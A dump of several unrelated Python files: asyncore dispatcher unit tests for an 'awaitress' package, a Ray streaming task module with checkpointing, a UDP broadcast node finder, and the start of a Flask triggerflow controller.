# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
# self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
# self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
# self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self): # pragma: no cover
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with closewrapper(socket.socket(self.family)) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
@reap_threads
def test_quick_connect(self): # pragma: no cover
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=5))
t.start()
try:
sock = socket.socket(self.family, socket.SOCK_STREAM)
with closewrapper(sock) as s:
s.settimeout(0.2)
s.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0)
)
try:
s.connect(server.address)
except OSError:
pass
finally:
join_thread(t, timeout=TIMEOUT)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(IPV6_ENABLED, "IPv6 support required")
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, "Unix sockets required")
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
class Test__strerror(unittest.TestCase):
def _callFUT(self, err):
from awaitress.wasyncore import _strerror
return _strerror(err)
def test_gardenpath(self):
self.assertEqual(self._callFUT(1), "Operation not permitted")
def test_unknown(self):
self.assertEqual(self._callFUT("wut"), "Unknown error wut")
class Test_read(unittest.TestCase):
def _callFUT(self, dispatcher):
from awaitress.wasyncore import read
return read(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from awaitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
class Test_write(unittest.TestCase):
def _callFUT(self, dispatcher):
from awaitress.wasyncore import write
return write(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from awaitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertTrue(inst.error_handled)
class Test__exception(unittest.TestCase):
def _callFUT(self, dispatcher):
from awaitress.wasyncore import _exception
return _exception(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from awaitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertTrue(inst.error_handled)
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class Test_readwrite(unittest.TestCase):
def _callFUT(self, obj, flags):
from awaitress.wasyncore import readwrite
return readwrite(obj, flags)
def test_handle_read_event(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
def test_handle_write_event(self):
flags = 0
flags |= select.POLLOUT
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.write_event_handled)
def test_handle_expt_event(self):
flags = 0
flags |= select.POLLPRI
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.expt_event_handled)
def test_handle_close(self):
flags = 0
flags |= select.POLLHUP
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.close_handled)
def test_socketerror_not_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.EALREADY, "EALREADY"))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
def test_socketerror_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.ECONNRESET, "ECONNRESET"))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.close_handled)
def test_exception_in_reraised(self):
from awaitress import wasyncore
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(wasyncore.ExitNow)
self.assertRaises(wasyncore.ExitNow, self._callFUT, inst, flags)
self.assertTrue(inst.read_event_handled)
def test_exception_not_in_reraised(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(ValueError)
self._callFUT(inst, flags)
self.assertTrue(inst.error_handled)
class Test_poll(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from awaitress.wasyncore import poll
return poll(timeout, map)
def test_nothing_writable_nothing_readable_but_map_not_empty(self):
# i read the mock.patch docs. nerp.
dummy_time = DummyTime()
map = {0: DummyDispatcher()}
try:
from awaitress import wasyncore
old_time = wasyncore.time
wasyncore.time = dummy_time
result = self._callFUT(map=map)
finally:
wasyncore.time = old_time
self.assertEqual(result, None)
self.assertEqual(dummy_time.sleepvals, [0.0])
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EINTR))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
result = self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(result, None)
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EBADF))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
class Test_poll2(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from awaitress.wasyncore import poll2
return poll2(timeout, map)
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EINTR))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EBADF))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0: disp}
try:
from awaitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
class Test_dispatcher(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from awaitress.wasyncore import dispatcher
return dispatcher(sock=sock, map=map)
def test_unexpected_getpeername_exc(self):
sock = dummysocket()
def getpeername():
raise socket.error(errno.EBADF)
map = {}
sock.getpeername = getpeername
self.assertRaises(socket.error, self._makeOne, sock=sock, map=map)
self.assertEqual(map, {})
def test___repr__accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
inst.addr = ("localhost", 8080)
result = repr(inst)
expected = "<awaitress.wasyncore.dispatcher listening localhost:8080 at"
self.assertEqual(result[: len(expected)], expected)
def test___repr__connected(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = False
inst.connected = True
inst.addr = ("localhost", 8080)
result = repr(inst)
expected = "<awaitress.wasyncore.dispatcher connected localhost:8080 at"
self.assertEqual(result[: len(expected)], expected)
def test_set_reuse_addr_with_socketerror(self):
sock = dummysocket()
map = {}
def setsockopt(*arg, **kw):
sock.errored = True
raise socket.error
sock.setsockopt = setsockopt
sock.getsockopt = lambda *arg: 0
inst = self._makeOne(sock=sock, map=map)
inst.set_reuse_addr()
self.assertTrue(sock.errored)
def test_connect_raise_socket_error(self):
sock = dummysocket()
map = {}
sock.connect_ex = lambda *arg: 1
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.connect, 0)
def test_accept_raise_TypeError(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise TypeError
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
result = inst.accept()
self.assertEqual(result, None)
def test_accept_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise socket.error(122)
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.accept)
def test_send_raise_EWOULDBLOCK(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(errno.EWOULDBLOCK)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
result = inst.send("a")
self.assertEqual(result, 0)
def test_send_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(122)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.send, "a")
def test_recv_raises_disconnect(self):
sock = dummysocket()
map = {}
def recv(*arg, **kw):
raise socket.error(errno.ECONNRESET)
def handle_close():
inst.close_handled = True
sock.recv = recv
inst = self._makeOne(sock=sock, map=map)
inst.handle_close = handle_close
result = inst.recv(1)
self.assertEqual(result, b"")
self.assertTrue(inst.close_handled)
def test_close_raises_unknown_socket_error(self):
sock = dummysocket()
map = {}
def close():
raise socket.error(122)
sock.close = close
inst = self._makeOne(sock=sock, map=map)
inst.del_channel = lambda: None
self.assertRaises(socket.error, inst.close)
def test_handle_read_event_not_accepting_not_connected_connecting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_connect_event():
inst.connect_event_handled = True
def handle_read():
inst.read_handled = True
inst.handle_connect_event = handle_connect_event
inst.handle_read = handle_read
inst.accepting = False
inst.connected = False
inst.connecting = True
inst.handle_read_event()
self.assertTrue(inst.connect_event_handled)
self.assertTrue(inst.read_handled)
def test_handle_connect_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.handle_connect_event)
def test_handle_expt_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
inst.handle_close = handle_close
inst.handle_expt_event()
self.assertTrue(inst.close_handled)
def test_handle_write_event_while_accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
result = inst.handle_write_event()
self.assertEqual(result, None)
def test_handle_error_gardenpath(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
def compact_traceback(*arg, **kw):
return None, None, None, None
def log_info(self, *arg):
inst.logged_info = arg
inst.handle_close = handle_close
inst.compact_traceback = compact_traceback
inst.log_info = log_info
inst.handle_error()
self.assertTrue(inst.close_handled)
self.assertEqual(inst.logged_info, ("error",))
def test_handle_close(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def log_info(self, *arg):
inst.logged_info = arg
def close():
inst._closed = True
inst.log_info = log_info
inst.close = close
inst.handle_close()
self.assertTrue(inst._closed)
def test_handle_accepted(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.handle_accepted(sock, "1")
self.assertTrue(sock.closed)
class Test_dispatcher_with_send(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from awaitress.wasyncore import dispatcher_with_send
return dispatcher_with_send(sock=sock, map=map)
def test_writable(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.out_buffer = b"123"
inst.connected = True
self.assertTrue(inst.writable())
class Test_close_all(unittest.TestCase):
def _callFUT(self, map=None, ignore_all=False):
from awaitress.wasyncore import close_all
return close_all(map, ignore_all)
def test_socketerror_on_close_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EBADF))
map = {0: disp}
self._callFUT(map)
self.assertEqual(map, {})
def test_socketerror_on_close_non_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EAGAIN))
map = {0: disp}
self.assertRaises(socket.error, self._callFUT, map)
def test_reraised_exc_on_close(self):
disp = DummyDispatcher(exc=KeyboardInterrupt)
map = {0: disp}
self.assertRaises(KeyboardInterrupt, self._callFUT, map)
def test_unknown_exc_on_close(self):
disp = DummyDispatcher(exc=RuntimeError)
map = {0: disp}
self.assertRaises(RuntimeError, self._callFUT, map)
class DummyDispatcher(object):
read_event_handled = False
write_event_handled = False
expt_event_handled = False
error_handled = False
close_handled = False
accepting = False
def __init__(self, exc=None):
self.exc = exc
def handle_read_event(self):
self.read_event_handled = True
if self.exc is not None:
raise self.exc
def handle_write_event(self):
self.write_event_handled = True
if self.exc is not None:
raise self.exc
def handle_expt_event(self):
self.expt_event_handled = True
if self.exc is not None:
raise self.exc
def handle_error(self):
self.error_handled = True
def handle_close(self):
self.close_handled = True
def readable(self):
return False
def writable(self):
return False
def close(self):
if self.exc is not None:
raise self.exc
class DummyTime(object):
def __init__(self):
self.sleepvals = []
def sleep(self, val):
self.sleepvals.append(val)
class DummySelect(object):
error = select.error
def __init__(self, exc=None, pollster=None):
self.selected = []
self.pollster = pollster
self.exc = exc
def select(self, *arg):
self.selected.append(arg)
if self.exc is not None:
raise self.exc
def poll(self):
return self.pollster
class DummyPollster(object):
def __init__(self, exc=None):
self.polled = []
self.exc = exc
def poll(self, timeout):
self.polled.append(timeout)
if self.exc is not None:
raise self.exc
else: # pragma: no cover
return []
|
task.py
|
import logging
import pickle
import threading
import time
import typing
from abc import ABC, abstractmethod
from typing import Optional
from ray.streaming.collector import OutputCollector
from ray.streaming.config import Config
from ray.streaming.context import RuntimeContextImpl
from ray.streaming.generated import remote_call_pb2
from ray.streaming.runtime import serialization
from ray.streaming.runtime.command import WorkerCommitReport
from ray.streaming.runtime.failover import Barrier, OpCheckpointInfo
from ray.streaming.runtime.remote_call import RemoteCallMst
from ray.streaming.runtime.serialization import \
PythonSerializer, CrossLangSerializer
from ray.streaming.runtime.transfer import CheckpointBarrier
from ray.streaming.runtime.transfer import DataMessage
from ray.streaming.runtime.transfer import ChannelID, DataWriter, DataReader
from ray.streaming.runtime.transfer import ChannelRecoverInfo
from ray.streaming.runtime.transfer import ChannelInterruptException
if typing.TYPE_CHECKING:
from ray.streaming.runtime.worker import JobWorker
from ray.streaming.runtime.processor import Processor, SourceProcessor
logger = logging.getLogger(__name__)
class StreamTask(ABC):
"""Base class for all streaming tasks. Each task runs a processor."""
def __init__(self, task_id: int, processor: "Processor",
worker: "JobWorker", last_checkpoint_id: int):
self.worker_context = worker.worker_context
self.vertex_context = worker.execution_vertex_context
self.task_id = task_id
self.processor = processor
self.worker = worker
self.config: dict = worker.config
self.reader: Optional[DataReader] = None
self.writer: Optional[DataWriter] = None
self.is_initial_state = True
self.last_checkpoint_id: int = last_checkpoint_id
self.thread = threading.Thread(target=self.run, daemon=True)
def do_checkpoint(self, checkpoint_id: int, input_points):
logger.info("Start do checkpoint, cp id {}, inputPoints {}.".format(
checkpoint_id, input_points))
output_points = None
if self.writer is not None:
output_points = self.writer.get_output_checkpoints()
operator_checkpoint = self.processor.save_checkpoint()
op_checkpoint_info = OpCheckpointInfo(
operator_checkpoint, input_points, output_points, checkpoint_id)
self.__save_cp_state_and_report(op_checkpoint_info, checkpoint_id)
barrier_pb = remote_call_pb2.Barrier()
barrier_pb.id = checkpoint_id
byte_buffer = barrier_pb.SerializeToString()
if self.writer is not None:
self.writer.broadcast_barrier(checkpoint_id, byte_buffer)
logger.info("Operator checkpoint {} finish.".format(checkpoint_id))
def __save_cp_state_and_report(self, op_checkpoint_info, checkpoint_id):
logger.info(
"Start to save cp state and report, checkpoint id is {}.".format(
checkpoint_id))
self.__save_cp(op_checkpoint_info, checkpoint_id)
self.__report_commit(checkpoint_id)
self.last_checkpoint_id = checkpoint_id
def __save_cp(self, op_checkpoint_info, checkpoint_id):
logger.info("save operator cp, op_checkpoint_info={}".format(
op_checkpoint_info))
cp_bytes = pickle.dumps(op_checkpoint_info)
self.worker.context_backend.put(
self.__gen_op_checkpoint_key(checkpoint_id), cp_bytes)
def __report_commit(self, checkpoint_id: int):
logger.info("Report commit, checkpoint id {}.".format(checkpoint_id))
report = WorkerCommitReport(self.vertex_context.actor_id.binary(),
checkpoint_id)
RemoteCallMst.report_job_worker_commit(self.worker.master_actor,
report)
def clear_expired_cp_state(self, checkpoint_id):
cp_key = self.__gen_op_checkpoint_key(checkpoint_id)
self.worker.context_backend.remove(cp_key)
def clear_expired_queue_msg(self, checkpoint_id):
# clear operator checkpoint
if self.writer is not None:
self.writer.clear_checkpoint(checkpoint_id)
def request_rollback(self, exception_msg: str):
self.worker.request_rollback(exception_msg)
def __gen_op_checkpoint_key(self, checkpoint_id):
op_checkpoint_key = Config.JOB_WORKER_OP_CHECKPOINT_PREFIX_KEY + str(
self.vertex_context.job_name) + "_" + str(
self.vertex_context.exe_vertex_name) + "_" + str(checkpoint_id)
logger.info(
"Generate op checkpoint key {}. ".format(op_checkpoint_key))
return op_checkpoint_key
def prepare_task(self, is_recreate: bool):
logger.info(
"Preparing stream task, is_recreate={}.".format(is_recreate))
channel_conf = dict(self.worker.config)
channel_size = int(
self.worker.config.get(Config.CHANNEL_SIZE,
Config.CHANNEL_SIZE_DEFAULT))
channel_conf[Config.CHANNEL_SIZE] = channel_size
channel_conf[Config.CHANNEL_TYPE] = self.worker.config \
.get(Config.CHANNEL_TYPE, Config.NATIVE_CHANNEL)
execution_vertex_context = self.worker.execution_vertex_context
build_time = execution_vertex_context.build_time
# when use memory state, if actor throw exception, will miss state
op_checkpoint_info = OpCheckpointInfo()
cp_bytes = None
# get operator checkpoint
if is_recreate:
cp_key = self.__gen_op_checkpoint_key(self.last_checkpoint_id)
logger.info("Getting task checkpoints from state, "
"cpKey={}, checkpointId={}.".format(
cp_key, self.last_checkpoint_id))
cp_bytes = self.worker.context_backend.get(cp_key)
if cp_bytes is None:
msg = "Task recover failed, checkpoint is null!"\
"cpKey={}".format(cp_key)
raise RuntimeError(msg)
if cp_bytes is not None:
op_checkpoint_info = pickle.loads(cp_bytes)
self.processor.load_checkpoint(op_checkpoint_info.operator_point)
logger.info("Stream task recover from checkpoint state,"
"checkpoint bytes len={}, checkpointInfo={}.".format(
cp_bytes.__len__(), op_checkpoint_info))
# writers
collectors = []
output_actors_map = {}
for edge in execution_vertex_context.output_execution_edges:
target_task_id = edge.target_execution_vertex_id
target_actor = execution_vertex_context \
.get_target_actor_by_execution_vertex_id(target_task_id)
channel_name = ChannelID.gen_id(self.task_id, target_task_id,
build_time)
output_actors_map[channel_name] = target_actor
if len(output_actors_map) > 0:
channel_str_ids = list(output_actors_map.keys())
target_actors = list(output_actors_map.values())
logger.info("Create DataWriter channel_ids {},"
"target_actors {}, output_points={}.".format(
channel_str_ids, target_actors,
op_checkpoint_info.output_points))
self.writer = DataWriter(channel_str_ids, target_actors,
channel_conf)
logger.info("Create DataWriter succeed channel_ids {}, "
"target_actors {}.".format(channel_str_ids,
target_actors))
for edge in execution_vertex_context.output_execution_edges:
collectors.append(
OutputCollector(self.writer, channel_str_ids,
target_actors, edge.partition))
# readers
input_actor_map = {}
for edge in execution_vertex_context.input_execution_edges:
source_task_id = edge.source_execution_vertex_id
source_actor = execution_vertex_context \
.get_source_actor_by_execution_vertex_id(source_task_id)
channel_name = ChannelID.gen_id(source_task_id, self.task_id,
build_time)
input_actor_map[channel_name] = source_actor
if len(input_actor_map) > 0:
channel_str_ids = list(input_actor_map.keys())
from_actors = list(input_actor_map.values())
logger.info("Create DataReader, channels {},"
"input_actors {}, input_points={}.".format(
channel_str_ids, from_actors,
op_checkpoint_info.input_points))
self.reader = DataReader(channel_str_ids, from_actors,
channel_conf)
def exit_handler():
# Make DataReader stop read data when MockQueue destructor
# gets called to avoid crash
self.cancel_task()
import atexit
atexit.register(exit_handler)
runtime_context = RuntimeContextImpl(
self.worker.task_id,
execution_vertex_context.execution_vertex.execution_vertex_index,
execution_vertex_context.get_parallelism(),
config=channel_conf,
job_config=channel_conf)
logger.info("open Processor {}".format(self.processor))
self.processor.open(collectors, runtime_context)
# immediately save cp. In case of FO in cp 0
# or use old cp in multi node FO.
self.__save_cp(op_checkpoint_info, self.last_checkpoint_id)
def recover(self, is_recreate: bool):
self.prepare_task(is_recreate)
recover_info = ChannelRecoverInfo()
if self.reader is not None:
recover_info = self.reader.get_channel_recover_info()
self.thread.start()
logger.info("Start operator success.")
return recover_info
@abstractmethod
def run(self):
pass
@abstractmethod
def cancel_task(self):
pass
@abstractmethod
def commit_trigger(self, barrier: Barrier) -> bool:
pass
class InputStreamTask(StreamTask):
"""Base class for stream tasks that execute a
:class:`runtime.processor.OneInputProcessor` or
:class:`runtime.processor.TwoInputProcessor` """
def commit_trigger(self, barrier):
raise RuntimeError(
"commit_trigger is only supported in SourceStreamTask.")
def __init__(self, task_id, processor_instance, worker,
last_checkpoint_id):
super().__init__(task_id, processor_instance, worker,
last_checkpoint_id)
self.running = True
self.stopped = False
self.read_timeout_millis = \
int(worker.config.get(Config.READ_TIMEOUT_MS,
Config.DEFAULT_READ_TIMEOUT_MS))
self.python_serializer = PythonSerializer()
self.cross_lang_serializer = CrossLangSerializer()
def run(self):
logger.info("Input task thread start.")
try:
while self.running:
self.worker.initial_state_lock.acquire()
try:
item = self.reader.read(self.read_timeout_millis)
self.is_initial_state = False
finally:
self.worker.initial_state_lock.release()
if item is None:
continue
if isinstance(item, DataMessage):
msg_data = item.body
type_id = msg_data[0]
if type_id == serialization.PYTHON_TYPE_ID:
msg = self.python_serializer.deserialize(msg_data[1:])
else:
msg = self.cross_lang_serializer.deserialize(
msg_data[1:])
self.processor.process(msg)
elif isinstance(item, CheckpointBarrier):
logger.info("Got barrier:{}".format(item))
logger.info("Start to do checkpoint {}.".format(
item.checkpoint_id))
input_points = item.get_input_checkpoints()
self.do_checkpoint(item.checkpoint_id, input_points)
logger.info("Do checkpoint {} success.".format(
item.checkpoint_id))
else:
raise RuntimeError(
"Unknown item type! item={}".format(item))
except ChannelInterruptException:
logger.info("queue has stopped.")
except BaseException as e:
logger.exception(
"Last success checkpointId={}, now occur error.".format(
self.last_checkpoint_id))
self.request_rollback(str(e))
logger.info("Source fetcher thread exit.")
self.stopped = True
def cancel_task(self):
self.running = False
while not self.stopped:
time.sleep(0.5)
pass
class OneInputStreamTask(InputStreamTask):
"""A stream task for executing :class:`runtime.processor.OneInputProcessor`
"""
def __init__(self, task_id, processor_instance, worker,
last_checkpoint_id):
super().__init__(task_id, processor_instance, worker,
last_checkpoint_id)
class SourceStreamTask(StreamTask):
"""A stream task for executing :class:`runtime.processor.SourceProcessor`
"""
processor: "SourceProcessor"
def __init__(self, task_id: int, processor_instance: "SourceProcessor",
worker: "JobWorker", last_checkpoint_id):
super().__init__(task_id, processor_instance, worker,
last_checkpoint_id)
self.running = True
self.stopped = False
self.__pending_barrier: Optional[Barrier] = None
def run(self):
logger.info("Source task thread start.")
try:
while self.running:
self.processor.fetch()
# check checkpoint
if self.__pending_barrier is not None:
# source fetcher only have outputPoints
barrier = self.__pending_barrier
logger.info("Start to do checkpoint {}.".format(
barrier.id))
self.do_checkpoint(barrier.id, barrier)
logger.info("Finish to do checkpoint {}.".format(
barrier.id))
self.__pending_barrier = None
except ChannelInterruptException:
logger.info("queue has stopped.")
except Exception as e:
logger.exception(
"Last success checkpointId={}, now occur error.".format(
self.last_checkpoint_id))
self.request_rollback(str(e))
logger.info("Source fetcher thread exit.")
self.stopped = True
def commit_trigger(self, barrier):
if self.__pending_barrier is not None:
logger.warning(
"Last barrier is not broadcast now, skip this barrier trigger."
)
return False
self.__pending_barrier = barrier
return True
def cancel_task(self):
self.running = False
while not self.stopped:
time.sleep(0.5)
pass
|
node_finder.py
|
import threading, time, socket
class node_finder:
'''
init function
@param self
@param config varaible with config
@return None
'''
def __init__(self, config):
self.config = config
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Enable port reusage so we will be able to run multiple clients and servers on single (host, port).
# Do not use socket.SO_REUSEADDR except you using linux(kernel<3.9): goto https://stackoverflow.com/questions/14388706/how-do-so-reuseaddr-and-so-reuseport-differ for more information.
# For linux hosts all sockets that want to share the same address and port combination must belong to processes that share the same effective user ID!
# So, on linux(kernel>=3.9) you have to run multiple servers and clients under one user to share the same (host, port).
# Thanks to @stevenreddie
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Enable broadcasting mode
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.sock.bind(("", config.finder_port))
# create listener as new theard
self.listener = threading.Thread(target=self.listener_hello)
# set theard as deamon
self.listener.daemon = True
# start theard
self.listener.start()
# empty list for finded nodes
self.nodes = []
'''
send find broarcast
@param self
@param retry number of sended packets
@return None
'''
def find_nodes(self, retry = 1):
for trying in range(retry):
self.sock.sendto(self.config.find_packet, ('<broadcast>', self.config.broadcast_port))
# wait 1s to send next
time.sleep(1)
'''
add new node to list
@param self
@param ip of node
@return None
'''
def add_node(self, ip):
if ip not in self.nodes:
self.nodes.append(ip)
'''
listener for hello packets
@param self
@return None
'''
def listener_hello(self):
while True:
data, addr = self.sock.recvfrom(1024)
if data == self.config.hello_packet:
self.add_node(addr[0])
|
controller.py
|
import logging
import os
import signal
import yaml
import time
from flask import Flask, jsonify, request
from gevent.pywsgi import WSGIServer
from triggerflow.service import storage
from triggerflow.service.worker import Worker
from triggerflow import eventsources
import threading
app = Flask(__name__)
app.debug = False
workers = {}
monitors = {}
config_map = None
trigger_storage = None
CONFIG_MAP_PATH = 'config_map.yaml'
def authenticate_request(db, auth):
if not auth or 'username' not in auth or 'password' not in auth:
return False
password = db.get_auth(username=auth['username'])
return password and password == auth['password']
@app.before_request
def before_request_func():
pass
# if not authenticate_request(trigger_storage, request.auth):
# return jsonify('Unauthorized'), 401
@app.route('/workspace/<workspace>', methods=['POST'])
def create_worker(workspace):
"""
This method gets the request parameters and starts a new thread worker
that will act as the event-processor for the the specific trigger workspace.
It returns 400 error if the provided parameters are not correct.
"""
